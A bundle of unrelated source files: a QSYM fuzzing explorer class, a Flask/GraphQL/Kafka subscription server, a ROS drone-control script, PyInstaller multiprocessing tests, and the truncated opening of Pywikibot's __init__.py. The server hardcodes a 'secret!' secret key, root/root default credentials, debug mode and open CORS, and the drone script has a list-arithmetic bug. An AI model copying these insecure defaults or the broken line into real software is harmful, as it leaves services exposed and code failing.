except Exception:
self.max_mem = str(1024*1024*20) # in kbytes
def make_dirs(self):
mkdir_force(self.seed_dir)
def base_dir_from_afl_input(self, afl_input):
split = afl_input.split("/")
return str(os.path.join("/", *split[:-4]))
# cov_file is dummy parameter
def run(self, input_id_map_list, cov_file):
"""
-create seed-out-dir
For each input,
-convert ktest move to seed-out-dir
-create sync dir
-build cmd
-create new process job
"""
pid = self.get_new_pid()
qsym_seed_dir = self.my_in_dir(str(pid))
mkdir_force(qsym_seed_dir)
se_info("{0} activated. input list : {1}".format(self, [x['input'] for x in input_id_map_list]))
se_info("{0} activated. input score : {1}".format(self, [x['score'] for x in input_id_map_list]))
se_info("{0} activated. input size: {1}".format(self, [x['size'] for x in input_id_map_list]))
# sync previousley generated seeds
self.sync_gen_seeds() #Redundant if the QSYM explorer cycle is always running shorter than the main cycle
# launch qsym for each inputs in my_in_dir
for input_id_map in input_id_map_list:
#QSYM does not support batch mode
assert len(input_id_map_list) <= 1
# print input_id_map
afl_input = input_id_map['input']
qsym_seed = os.path.join(qsym_seed_dir, afl_input.split("/")[-1])
shutil.copy2(afl_input, qsym_seed)
if not os.path.exists(qsym_seed):
se_info("no seed created: " + qsym_seed)
continue
#--create sync_dir for new qsym instance
key = "qsym_instance_conc_" + str(pid).zfill(6)
new_sync_dir = self.my_sync_dir(key)
mkdir_force(new_sync_dir)
# temp dir to store tmp genearated seeds
# filtered seeds will be transfer to new_sync_dir
tmp_dir = tempfile.mkdtemp()
mkdir_force(tmp_dir)
#--build qsym instance cmd
q, qsym_cmd = self.build_cmd(qsym_seed, tmp_dir, self.bitmap)
print ' '.join(qsym_cmd)
# q.run(self.max_time_per_seed)
#--construct process meta data, add to jobs list
kw = {'stdin':q.stdin, 'mem_cap': self.max_mem, 'use_shell':True,
'testcase_dir':q.testcase_dir, 'target_base_path':self.base_dir_from_afl_input(afl_input)}
p = multiprocessing.Process(target=utils.qsym_exec_async, args=[qsym_cmd], kwargs=kw) # Needs docker implementation
p.daemon = True
task_st = {}
task_st['instance'] = p
task_st['sync_dir'] = new_sync_dir
task_st['cmd'] = qsym_cmd
task_st['tmp_dir'] = tmp_dir
task_st['qsym'] = q
task_st['seed_index'] = 0
task_st['synced'] = False
task_st['key'] = key
task_st['processed'] = False
self.jobs[pid] = task_st
for pid, task in self.jobs.iteritems():
try:
if pid not in self.started_jobs:
task['instance'].start()
task['real_pid'] = task['instance'].pid
self.started_jobs.add(pid)
except Exception:
pass
return (key, [x['input'] for x in input_id_map_list])
def build_cmd(self, cur_input, cur_output, bitmap):
q = Executor(self.cmd, cur_input, cur_output, bitmap=bitmap, argv=["-l", "1"])
cmd = q.gen_cmd(self.max_time_per_seed)
return q, cmd
def sync_gen_seeds(self):
self.init_minimizer()
# copy the generated inputs back
for pid, task in self.jobs.iteritems():
if task['synced']:
continue
print "syncing ", task['sync_dir']
print "syncing ", task['key']
task['synced'] = True
qsym = task['qsym']
target_dir = task['sync_dir']
index = task['seed_index']
# for testcase in qsym.get_testcases():
# filename = os.path.join(target_dir, "id:%06d:src:%s" % (index, 'qsym'))
# index += 1
# se_info("moving %s to %s" % (testcase, filename))
# shutil.move(testcase, filename)
num_testcase = 0
for testcase in qsym.get_testcases(task['sync_dir']):
# print testcase
if not self.minimizer.check_testcase(testcase):
# Remove if it's not interesting testcases
# os.unlink(testcase)
continue
target = os.path.basename(testcase)
filename = os.path.join(target_dir, "id:%06d:src:%s" % (index, task['key']+','+target))
index += 1
# se_info("moving %s to %s" % (testcase, filename))
shutil.move(testcase, filename)
se_info("Creating: %s" % filename)
# remove the tmp dir
shutil.rmtree(task['tmp_dir'])
def alive(self):
alive = False
#This call is to activate something (sorry i don't remember now :-/)
multiprocessing.active_children() # Maybe needs docker implementation?
for pid in [self.jobs[x]['real_pid'] for x in self.jobs]:
try:
os.kill(pid, 0)
print "conc_explorer pid: {0} is alive".format(pid)
alive = True
except Exception:
pass
# print "conc_explorer pid: {0} not alive".format(pid)
return alive
def stop(self):
"""
Terminate all jobs,
you could have more fine-grained control by extending this function
"""
se_info("{0} deactivated".format(self))
self.sync_gen_seeds() # syncs the seeds from /tmp/.../queuefolder to .../muse-djpeg-sync/qsym_instance_conc_000xxx
for pid, task in self.jobs.iteritems():
if task['processed']:
continue
task['processed'] = True
se_info("Terminting qsym instance: {0} {1} real pid:{2}".format(pid, task['instance'], task['real_pid']))
utils.terminate_proc_tree(task['real_pid']) # Maybe needs docker implementation?
self.jobs[pid]['processed'] = True
def get_new_pid(self):
self.pid_ctr += 1
return self.pid_ctr
def terminate_callback(self):
"""called when SIGINT and SIGTERM"""
pass
def periodic_callback(self):
"""called every 1 hour"""
pass
|
server.asyncio.py
|
#
# Copyright (c) 2020, 2021, John Grundback
# All rights reserved.
#
import sys
import os
import logging
logging.basicConfig(level=logging.INFO)
# logging.basicConfig(level=logging.DEBUG)
import simplejson as json
from flask import Flask
from flask_restful import Api
from flask_cors import CORS, cross_origin
from flask_swagger import swagger
from flask import request
from flask.views import View
from flask_graphql import GraphQLView
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from flask_socketio import SocketIO
from flask_socketio import send, emit
from flask_sockets import Sockets
from graphql_ws.gevent import GeventSubscriptionServer
import asyncio, os # , json
import asyncio
import threading
import graphql
# from kafka import KafkaProducer
from aiokafka import AIOKafkaConsumer
from gfs.lib.config import GremlinFSConfig
from gfs.api.graphql.resource.schema import GFSGQLSchemas
from gfs.api.graphql.gql import GFSGQLView
app = Flask(__name__)
cors = CORS(app)
app.config["DEBUG"] = True
app.config['CORS_HEADERS'] = 'Content-Type'
app.config['SECRET_KEY'] = 'secret!'
api = Api(app)
# socketio = SocketIO(app)
# socketio = SocketIO(app, logger=True, engineio_logger=True, debug=True)
socketio = SocketIO(app, cors_allowed_origins="*")
sockets = Sockets(app)
app.app_protocol = lambda environ_path_info: 'graphql-ws'
listen_addr = os.environ.get("LISTEN_ADDR", "0.0.0.0")
listen_port = os.environ.get("LISTEN_PORT", "5000")
# gfs_ns = os.environ.get("GFS_NAMESPACE", "gfs1")
gfs_host = os.environ.get("GFS_HOST", "gfsapi")
gfs_port = os.environ.get("GFS_PORT", "5000")
gfs_username = os.environ.get("GFS_USERNAME", "root")
gfs_password = os.environ.get("GFS_PASSWORD", "root")
kafka_host = os.environ.get("KAFKA_HOST", "kafka")
kafka_port = os.environ.get("KAFKA_PORT", "9092")
kafka_username = os.environ.get("KAFKA_USERNAME", None) # "kafka")
kafka_password = os.environ.get("KAFKA_PASSWORD", None) # "kafka")
if len(sys.argv) >= 3:
listen_addr = sys.argv[1]
listen_port = sys.argv[2]
elif len(sys.argv) >= 2:
listen_port = sys.argv[1]
config = GremlinFSConfig(
kafka_host = kafka_host,
kafka_port = kafka_port,
kafka_username = kafka_username,
kafka_password = kafka_password
)
kftopic1 = config.get("kf_topic1", "gfs1")
kftopic2 = config.get("kf_topic2", "gfs2")
kfgroup = config.get("kf_group", "ripple-group")
# @socketio.on('connect', namespace='/gfs1')
# def gfs1_connect():
# emit('message', {'data': 'Connected'})
# @socketio.on('disconnect', namespace='/gfs1')
# def gfs1_disconnect():
# pass
# @socketio.on('message', namespace='/gfs1')
# def handle_message(message):
# emit("message", "message response")
# @sockets.route('/subscriptions')
# def echo_socket(ws):
# subscription_server = GeventSubscriptionServer(
# # GFSGQLSchema(
# # "gfs1",
# # GFSGQLSchemas.instance()
# # ) # GFSGQLSchemas.instance().schema("gfs1")
# GFSGQLSchemas.instance().schema("gfs1")
# )
# subscription_server.handle(ws)
# return []
@sockets.route('/<namespace>/graphql/subscriptions')
def echo_socket2(ws, namespace):
subscription_server = GeventSubscriptionServer(
# GFSGQLSchema(
# namespace,
# GFSGQLSchemas.instance()
# ) # GFSGQLSchemas.instance().schema(namespace)
GFSGQLSchemas.instance().schema(namespace)
)
subscription_server.handle(ws)
return []
# schemas = GFSGQLSchemas()
# GFSGQLSchemas.instance(schemas)
# view_func = GFSGQLView.as_view(
# 'graphql',
# namespace='gfs1',
# schemas=GFSGQLSchemas.instance()
# )
# app.add_url_rule(
# '/<namespace>/graphql',
# view_func=view_func
# )
class GraphQLSchema(View):
def dispatch_request(self, namespace):
schemas = GFSGQLSchemas.instance()
return str( schemas.schema(namespace) )
view_func2 = GraphQLSchema.as_view(
'graphql2'
)
app.add_url_rule(
'/<namespace>/graphql/schema',
view_func=view_func2
)
#
# Quick and dirty schema rectifier
# TODO: Quick schema gen with no resolvers
# I use this for resolving field cardinality
#
def rewrite_node(node, schema, _type):
nnode = {}
for key in node:
val = node[key]
if _type and key in _type.fields:
if val and type(val) == dict:
typelabel = val.get("label")
if( isinstance(_type.fields[key].type, graphql.GraphQLList) ):
nnode[key] = [rewrite_node(node[key], schema, schema.get_type(typelabel))]
else:
nnode[key] = rewrite_node(node[key], schema, schema.get_type(typelabel))
else:
nnode[key] = val
else:
nnode[key] = val
return nnode
def pathtostring(path):
spath = ""
if path:
for pathitem in path:
# if "label" in pathitem and "source" in pathitem and "target" in pathitem:
spath = "(" + pathitem.get("source", {}).get("label") + " " + pathitem.get("source", {}).get("id") + " -> " + pathitem.get("label") + " -> " + pathitem.get("target", {}).get("label") + " " + pathitem.get("target", {}).get("id") + ") " + spath
return spath
async def consume():
schemas = GFSGQLSchemas.instance()
consumer = AIOKafkaConsumer(
# kftopic1,
kftopic2,
bootstrap_servers=str(kafka_host) + ":" + str(kafka_port),
enable_auto_commit=True,
group_id=kfgroup,
auto_offset_reset='latest',
max_poll_records=5,
max_poll_interval_ms=3000000,
# session_timeout_ms=3000000,
# request_timeout_ms=3000000,
# connections_max_idle_ms=3000000
heartbeat_interval_ms=9000,
)
# Get cluster layout and join group `my-group`
await consumer.start()
try:
# Consume messages
async for msg in consumer:
message = json.loads(msg.value)
key = msg.key
#
# LINK EVENT message
#
# {
# "event": "create_link",
# "link": {
# "id": 1234,
# "label": "label",
# "source": {
# "id": 1235,
# "label": "label"
# },
# "target": {
# "id": 1236,
# "label": "label"
# }
# }
# }
#
# NODE EVENT message
#
# {
# "event": "create_node",
# "node": {
# "id": 1235,
# "label": "label"
# }
# }
namespace = message.get('namespace', None)
event = message.get('event', None)
chain = message.get('chain', [])
path = message.get('path', [])
origin = message.get('origin', {})
link = message.get('link', {})
node = message.get('node', {})
if not chain:
chain = []
if not path:
path = []
if link:
pass
elif node:
# Set the origin, origin should never change
# but should be initialized to node if if not set
# as this would be the original event.
# Make sure to copy so we get the unaltered version.
if not origin:
origin = node.copy()
nodeid = node.get('id', None)
nodelabel = node.get('label', None)
originid = origin.get('id', None)
originlabel = origin.get('label', None)
# logging.debug(" NODE EVENT: namespace: " + str(namespace))
# logging.debug(" NODE EVENT: event: " + str(event))
# logging.debug(" NODE EVENT: node id: " + str(nodeid))
# logging.debug(" NODE EVENT: node label: " + str(nodelabel))
logging.debug(" => EVENT: namespace: " + str(namespace) + ", event: " + str(event) + ", node: " + str(nodelabel) + " " + str(nodeid) + ", origin: " + str(originlabel) + " " + str(originid) + ", path: " + str(pathtostring(path)))
#
# Quick and dirty schema rectifier
# TODO: Quick schema gen with no resolvers
# I use this for resolving field cardinality
#
# schema = schemas.quickschema(namespace)
# node = rewrite_node(node, schema, schema.get_type(nodelabel))
# logging.debug({
# "namespace": str(namespace),
# "event": str(event),
# "id": str(nodeid),
# "label": str(nodelabel),
# "chain": chain,
# # "node":
# "node": node,
# "origin": origin,
# "path": path
# })
if nodeid and nodelabel:
# subject = schemas.subject(namespace, nodelabel)
subject = schemas.subject(namespace, event)
# if subject:
# subject.on_next(message)
if subject:
subject.on_next({
"namespace": str(namespace),
"event": str(event),
"chain": chain,
"id": str(nodeid),
"label": str(nodelabel),
# "node":
"node": node,
"origin": origin,
"path": path
})
except Exception as e:
# Will leave consumer group; perform autocommit if enabled.
await consumer.stop()
finally:
# Will leave consumer group; perform autocommit if enabled.
await consumer.stop()
# async def send_one():
# producer = AIOKafkaProducer(
# bootstrap_servers=str(kafka_host) + ":" + str(kafka_port)
# )
# # Get cluster layout and initial topic/partition leadership information
# await producer.start()
# try:
# # Produce message
# await producer.send_and_wait(kftopic1, b"Super message")
# finally:
# # Wait for all pending messages to be delivered or expire.
# await producer.stop()
def __start_background_loop(thing):
def run_forever(thing):
# RuntimeError: There is no current event loop in thread 'Thread-1'.
# loop = asyncio.get_event_loop()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
result = loop.run_until_complete(thing)
thread = threading.Thread(target=run_forever, args=(thing,))
thread.start()
# Python 3.7
# asyncio.run(consume())
# asyncio.run(send_one())
# Python 3.6
# AttributeError: module 'asyncio' has no attribute 'run'
# loop = asyncio.get_event_loop()
# result = loop.run_until_complete(consume())
__start_background_loop(consume())
logging.debug(str(listen_addr))
logging.debug(int(listen_port))
logging.debug(str(kafka_host))
logging.debug(str(kafka_port))
logging.debug(str(kftopic1))
logging.debug(str(kftopic2))
logging.debug(str(kfgroup))
# server = pywsgi.WSGIServer(('0.0.0.0', 5000), app, handler_class=WebSocketHandler)
server = pywsgi.WSGIServer((str(listen_addr), int(listen_port)), app, handler_class=WebSocketHandler)
server.serve_forever()
|
closest_goal3.py
|
#! /usr/bin/env python3
import rospy
from time import time, sleep
from datetime import datetime
from ar_track_alvar_msgs.msg import AlvarMarkers
from control import *
from callback import get_drone_location
N = 3
(goalx_d, goaly_d, d) = (dict(), dict(), dict())
goal = {}
goal[0] = {'x': [0.59, 0.07], 'y': [-0.016, 0.477]}
goal[1] = {'x': [0.00, -0.407], 'y': [-0.016,0.003]}
goal[2] = {'x': [-0.59, 0.012], 'y': [-0.016, -0.41]}
if __name__ == '__main__':
try:
rospy.init_node('control_node', anonymous= False)
rate = rospy.Rate(10)
d[0] = ('192.168.11.39', 8889)
d[1] = ('192.168.11.49', 8889)
d[2] = ('192.168.11.41', 8889)
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
sleep(1)
receiveThread = threading.Thread(target=receive)
receiveThread.daemon = True
receiveThread.start()
for i in range(0, N):
send("command", 0, d[i])
sleep(3)
for i in range(0, N):
send("takeoff", 0, d[i])
sleep(8)
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
send("down 20", 0, d[1])
send("up 30", 0, d[0])
sleep(3)
robot_in_pos = False
j = 0
count = 0
while not rospy.is_shutdown():
if count == 200:
for i in range(0, N):
send("land", 0, d[i])
sleep(5)
sock1.close()
rospy.signal_shutdown('End of testing')
pass
else:
status = dict()
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
drone = get_drone_location(AlvarMsg)
if not robot_in_pos:
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
drone = get_drone_location(AlvarMsg)
if len(drone) == N:
drone = choose_goal(goal, drone)
print('\r\nDrone Position:')
for i in range(0, N):
print('drone_'+str(i+1)+' (x, y) = (%.2f, %.2f)' % (drone[i]['x'], drone[i]['y']))
goalx_d[i] = drone[i]['goal']['x']
goaly_d[i] = drone[i]['goal']['y']
print('')
sleep(1)
robot_in_pos = True
else:
robot_in_pos = False
count += 1
print (count)
else:
if j >= len(goalx_d[0]):
if all(value=='Goal Psition reached' for value in status.values()):
robot_in_pos = False
for i in range(0, N):
send("land", 0, d[i])
sleep(5)
print("Mission completed successfully!")
sock1.close()
rospy.signal_shutdown('End of testing')
pass
else:
if len(drone) == N:
for i in range(0, N):
status[i] = move_xy(goalx_d[i][len(goalx_d[i]-1)], goaly_d[i][len(goaly_d[i]-1)], drone[i]['x'], drone[i]['y'], d[i])
sleep(2)
else:
if len(drone) == N:
status = dict()
for i in range(0, N):
status[i] = move_xy(goalx_d[i][j], goaly_d[i][j], drone[i]['x'], drone[i]['y'], d[i])
sleep(2)
if all(value == 'Goal Position reached' for value in status.values()):
print(" ")
print ("Mission completed successfully!")
print("")
j += 1
sleep(3)
else:
count += 1
print (count)
except rospy.ROSInterruptException:
for i in range(0, N):
send("land", 0, d[i])
sleep(5)
sock1.close()
print('Simulation terminated')
pass
|
test_multiprocess.py
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright (c) 2005-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
# ----------------------------------------------------------------------------
# Library imports
# ---------------
import os
import sys
import pytest
# Local imports
# -------------
from PyInstaller.compat import is_win
from PyInstaller.utils.tests import importorskip, skipif
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess(pyi_builder):
pyi_builder.test_script('pyi_multiprocess.py')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_forking(pyi_builder):
pyi_builder.test_script('pyi_multiprocess_forking.py')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_pool(pyi_builder):
pyi_builder.test_script('pyi_multiprocess_pool.py')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_spawn_semaphore(pyi_builder, capfd):
pyi_builder.test_source("""
import sys
from multiprocessing import set_start_method, Process, Semaphore
from multiprocessing import freeze_support
from multiprocessing.util import log_to_stderr
def test(s):
s.acquire()
print('In subprocess')
s.release()
if __name__ == '__main__':
log_to_stderr()
freeze_support()
set_start_method('spawn')
print('In main')
sys.stdout.flush()
s = Semaphore()
s.acquire()
proc = Process(target=test, args = [s])
proc.start()
s.release()
proc.join()
""")
out, err = capfd.readouterr()
# Print the captured output and error so that it will show up in the test output.
sys.stderr.write(err)
sys.stdout.write(out)
expected = ["In main", "In subprocess"]
assert os.linesep.join(expected) in out
for substring in expected:
assert out.count(substring) == 1
@skipif(is_win, reason='fork is not available on windows')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_fork_semaphore(pyi_builder, capfd):
pyi_builder.test_source("""
import sys
from multiprocessing import set_start_method, Process, Semaphore
from multiprocessing import freeze_support
from multiprocessing.util import log_to_stderr
def test(s):
s.acquire()
print('In subprocess')
s.release()
if __name__ == '__main__':
log_to_stderr()
freeze_support()
set_start_method('fork')
print('In main')
sys.stdout.flush()
s = Semaphore()
s.acquire()
proc = Process(target=test, args = [s])
proc.start()
s.release()
proc.join()
""")
out, err = capfd.readouterr()
# Print the captured output and error so that it will show up in the test output.
sys.stderr.write(err)
sys.stdout.write(out)
expected = ["In main", "In subprocess"]
assert os.linesep.join(expected) in out
for substring in expected:
assert out.count(substring) == 1
@skipif(is_win, reason='forkserver is not available on windows')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_forkserver_semaphore(pyi_builder, capfd):
pyi_builder.test_source("""
import sys
from multiprocessing import set_start_method, Process, Semaphore
from multiprocessing import freeze_support
from multiprocessing.util import log_to_stderr
def test(s):
s.acquire()
print('In subprocess')
s.release()
if __name__ == '__main__':
log_to_stderr()
freeze_support()
set_start_method('forkserver')
print('In main')
sys.stdout.flush()
s = Semaphore()
s.acquire()
proc = Process(target=test, args = [s])
proc.start()
s.release()
proc.join()
""")
out, err = capfd.readouterr()
# Print the captured output and error so that it will show up in the test output.
sys.stderr.write(err)
sys.stdout.write(out)
expected = ["In main", "In subprocess"]
assert os.linesep.join(expected) in out
for substring in expected:
assert out.count(substring) == 1
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_spawn_process(pyi_builder, capfd):
# Test whether this terminates, see issue #4865
pyi_builder.test_source("""
import sys, time
import multiprocessing as mp
def test():
time.sleep(1)
print('In subprocess')
print(sys.argv)
mp.freeze_support()
mp.set_start_method('spawn')
print('In main')
proc = mp.Process(target=test)
proc.start()
proc.join()
""")
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_spawn_pool(pyi_builder, capfd):
# Test whether this terminates, see issue #4865
pyi_builder.test_source("""
import sys, time
import multiprocessing as mp
def test(s):
time.sleep(1)
print(s)
print(sys.argv,)
mp.freeze_support()
mp.set_start_method('spawn')
print('In main')
with mp.Pool() as p:
p.map(test, 'in pool')
""")
|
__init__.py
|
"""The initialization file for the Pywikibot framework."""
#
# (C) Pywikibot team, 2008-2021
#
# Distributed under the terms of the MIT license.
#
import atexit
import datetime
import math
import re
import threading
import time
from contextlib import suppress
from decimal import Decimal
from queue import Queue
from typing import Optional, Union
from urllib.parse import urlparse
from warnings import warn
from pywikibot.__metadata__ import (
__copyright__, __description__, __download_url__, __license__,
__maintainer__, __maintainer_email__, __name__, __url__, __version__)
from pywikibot._wbtypes import WbRepresentation as _WbRepresentation
from pywikibot.backports import cache, removesuffix
from pywikibot.bot import (
input, input_choice, input_yn, handle_args, show_help, ui,
calledModuleName, Bot, CurrentPageBot, WikidataBot,
)
from pywikibot.bot_choice import (
QuitKeyboardInterrupt as _QuitKeyboardInterrupt,
)
from pywikibot import config2 as config
from pywikibot.data.api import UploadWarning
from pywikibot.diff import PatchManager
from pywikibot.exceptions import (
BadTitle, CaptchaError, CascadeLockedPage, CircularRedirect,
CoordinateGlobeUnknownException, EditConflict, Error, FatalServerError,
InterwikiRedirectPage, InvalidTitle, IsNotRedirectPage, IsRedirectPage,
LockedNoPage, LockedPage, NoCreateError, NoMoveTarget, NoPage, NoSuchSite,
NoUsername, NoWikibaseEntity, OtherPageSaveError, PageCreatedConflict,
PageDeletedConflict, PageNotSaved, PageRelatedError, PageSaveRelatedError,
SectionError, Server414Error, Server504Error, ServerError,
SiteDefinitionError, SpamblacklistError, TitleblacklistError,
UnknownExtension, UnknownFamily, UnknownSite, UnsupportedPage,
WikiBaseError,
)
from pywikibot.family import AutoFamily, Family
from pywikibot.i18n import translate
from pywikibot.logging import (
critical, debug, error, exception, log, output, stdout, warning
)
from pywikibot.site import BaseSite, DataSite, APISite, ClosedSite
from pywikibot.tools import (
classproperty,
deprecate_arg as _deprecate_arg,
normalize_username,
MediaWikiVersion as _MediaWikiVersion,
ModuleDeprecationWrapper as _ModuleDeprecationWrapper,
redirect_func,
)
from pywikibot.tools.formatter import color_format
__all__ = (
'__copyright__', '__description__', '__download_url__', '__license__',
'__maintainer__', '__maintainer_email__', '__name__',
'__url__', '__version__',
'BadTitle', 'Bot', 'calledModuleName', 'CaptchaError', 'CascadeLockedPage',
'Category', 'CircularRedirect', 'Claim', 'config', 'Coordinate',
'CoordinateGlobeUnknownException', 'critical', 'CurrentPageBot', 'debug',
'EditConflict', 'error', 'Error', 'exception', 'FatalServerError',
'FilePage', 'handle_args', 'html2unicode', 'input',
'input_choice', 'input_yn', 'InterwikiRedirectPage', 'InvalidTitle',
'IsNotRedirectPage', 'IsRedirectPage', 'ItemPage', 'Link', 'LockedNoPage',
'LockedPage', 'log', 'NoCreateError', 'NoMoveTarget', 'NoPage',
'NoSuchSite', 'NoUsername', 'NoWikibaseEntity', 'OtherPageSaveError',
'output', 'Page', 'PageCreatedConflict', 'PageDeletedConflict',
'PageNotSaved', 'PageRelatedError', 'PageSaveRelatedError', 'PropertyPage',
'_QuitKeyboardInterrupt', 'SectionError', 'Server414Error',
'Server504Error', 'ServerError', 'showDiff', 'show_help',
'Site', 'SiteDefinitionError', 'SiteLink', 'SpamblacklistError', 'stdout',
'Timestamp', 'TitleblacklistError', 'translate', 'ui', 'unicode2html',
'UnknownExtension', 'UnknownFamily', 'UnknownSite', 'UnsupportedPage',
'UploadWarning', 'url2unicode', 'User', 'warning', 'WbGeoShape',
'WbMonolingualText', 'WbQuantity', 'WbTabularData', 'WbTime', 'WbUnknown',
'WikiBaseError', 'WikidataBot',
)
class Timestamp(datetime.datetime):
"""Class for handling MediaWiki timestamps.
This inherits from datetime.datetime, so it can use all of the methods
and operations of a datetime object. To ensure that the results of any
operation are also a Timestamp object, be sure to use only Timestamp
objects (and datetime.timedeltas) in any operation.
Use Timestamp.fromISOformat() and Timestamp.fromtimestampformat() to
create Timestamp objects from MediaWiki string formats.
As these constructors are typically used to create objects using data
passed provided by site and page methods, some of which return a Timestamp
when previously they returned a MediaWiki string representation, these
methods also accept a Timestamp object, in which case they return a clone.
Use Site.server_time() for the current time; this is more reliable
than using Timestamp.utcnow().
"""
mediawikiTSFormat = '%Y%m%d%H%M%S'
_ISO8601Format_new = '{0:+05d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
def clone(self):
"""Clone this instance."""
return self.replace(microsecond=self.microsecond)
@classproperty
def ISO8601Format(cls):
"""ISO8601 format string class property for compatibility purpose."""
return cls._ISO8601Format()
@classmethod
def _ISO8601Format(cls, sep: str = 'T') -> str:
"""ISO8601 format string.
@param sep: one-character separator, placed between the date and time
@return: ISO8601 format string
"""
assert len(sep) == 1
return '%Y-%m-%d{0}%H:%M:%SZ'.format(sep)
@classmethod
def fromISOformat(cls, ts, sep: str = 'T'):
"""Convert an ISO 8601 timestamp to a Timestamp object.
@param ts: ISO 8601 timestamp or a Timestamp object already
@type ts: str or Timestamp
@param sep: one-character separator, placed between the date and time
@return: Timestamp object
@rtype: Timestamp
"""
# If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
return cls.strptime(ts, cls._ISO8601Format(sep))
@classmethod
def fromtimestampformat(cls, ts):
"""Convert a MediaWiki internal timestamp to a Timestamp object."""
# If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
if len(ts) == 8: # year, month and day are given only
ts += '000'
return cls.strptime(ts, cls.mediawikiTSFormat)
def isoformat(self, sep='T'):
"""
Convert object to an ISO 8601 timestamp accepted by MediaWiki.
datetime.datetime.isoformat does not postfix the ISO formatted date
with a 'Z' unless a timezone is included, which causes MediaWiki
~1.19 and earlier to fail.
"""
return self.strftime(self._ISO8601Format(sep))
def totimestampformat(self):
"""Convert object to a MediaWiki internal timestamp."""
return self.strftime(self.mediawikiTSFormat)
def __str__(self):
"""Return a string format recognized by the API."""
return self.isoformat()
def __add__(self, other):
"""Perform addition, returning a Timestamp instead of datetime."""
newdt = super().__add__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
return newdt
def __sub__(self, other):
"""Perform subtraction, returning a Timestamp instead of datetime."""
newdt = super().__sub__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
return newdt
class Coordinate(_WbRepresentation):
"""Class for handling and storing Coordinates."""
_items = ('lat', 'lon', 'entity')
@_deprecate_arg('entity', 'globe_item')
def __init__(self, lat: float, lon: float, alt=None,
precision: Optional[float] = None,
globe: Optional[str] = None, typ: str = '',
name: str = '', dim: Optional[int] = None,
site: Optional[DataSite] = None, globe_item=None,
primary: bool = False):
"""
Represent a geo coordinate.
@param lat: Latitude
@param lon: Longitude
@param alt: Altitude? TODO FIXME
@param precision: precision
@param globe: Which globe the point is on
@param typ: The type of coordinate point
@param name: The name
@param dim: Dimension (in meters)
@param site: The Wikibase site
@param globe_item: The Wikibase item for the globe, or the entity URI
of this Wikibase item. Takes precedence over 'globe'
if present.
@type globe_item: pywikibot.ItemPage or str
@param primary: True for a primary set of coordinates
"""
self.lat = lat
self.lon = lon
self.alt = alt
self._precision = precision
self._entity = globe_item
self.type = typ
self.name = name
self._dim = dim
self.site = site or Site().data_repository()
self.primary = primary
if globe:
globe = globe.lower()
elif not globe_item:
globe = self.site.default_globe()
self.globe = globe
@property
def entity(self):
"""Return the entity uri of the globe."""
if not self._entity:
if self.globe not in self.site.globes():
raise CoordinateGlobeUnknownException(
'%s is not supported in Wikibase yet.'
% self.globe)
return self.site.globes()[self.globe]
if isinstance(self._entity, ItemPage):
return self._entity.concept_uri()
return self._entity
def toWikibase(self) -> dict:
"""
Export the data to a JSON object for the Wikibase API.
FIXME: Should this be in the DataSite object?
@return: Wikibase JSON
"""
return {'latitude': self.lat,
'longitude': self.lon,
'altitude': self.alt,
'globe': self.entity,
'precision': self.precision,
}
@classmethod
def fromWikibase(cls, data: dict, site: DataSite):
"""
Constructor to create an object from Wikibase's JSON output.
@param data: Wikibase JSON
@param site: The Wikibase site
@rtype: Coordinate
"""
globe = None
if data['globe']:
globes = {}
for name, entity in site.globes().items():
globes[entity] = name
globe = globes.get(data['globe'])
return cls(data['latitude'], data['longitude'],
data['altitude'], data['precision'],
globe, site=site, globe_item=data['globe'])
@property
def precision(self) -> Optional[float]:
"""
Return the precision of the geo coordinate.
The precision is calculated if the Coordinate does not have a
precision, and self._dim is set.
When no precision and no self._dim exists, None is returned.
The biggest error (in degrees) will be given by the longitudinal error;
the same error in meters becomes larger (in degrees) further up north.
We can thus ignore the latitudinal error.
The longitudinal can be derived as follows:
In small angle approximation (and thus in radians):
M{Δλ ≈ Δpos / r_φ}, where r_φ is the radius of earth at the given
latitude.
Δλ is the error in longitude.
M{r_φ = r cos φ}, where r is the radius of earth, φ the latitude
Therefore::
precision = math.degrees(
self._dim/(radius*math.cos(math.radians(self.lat))))
"""
if self._dim is None and self._precision is None:
return None
if self._precision is None and self._dim is not None:
radius = 6378137 # TODO: Support other globes
self._precision = math.degrees(
self._dim / (radius * math.cos(math.radians(self.lat))))
return self._precision
@precision.setter
def precision(self, value):
self._precision = value
def precisionToDim(self) -> Optional[int]:
"""
Convert precision from Wikibase to GeoData's dim and return the latter.
dim is calculated if the Coordinate doesn't have a dimension, and
precision is set. When neither dim nor precision are set, ValueError
is thrown.
Carrying on from the earlier derivation of precision, since
precision = math.degrees(dim/(radius*math.cos(math.radians(self.lat))))
we get::
dim = math.radians(
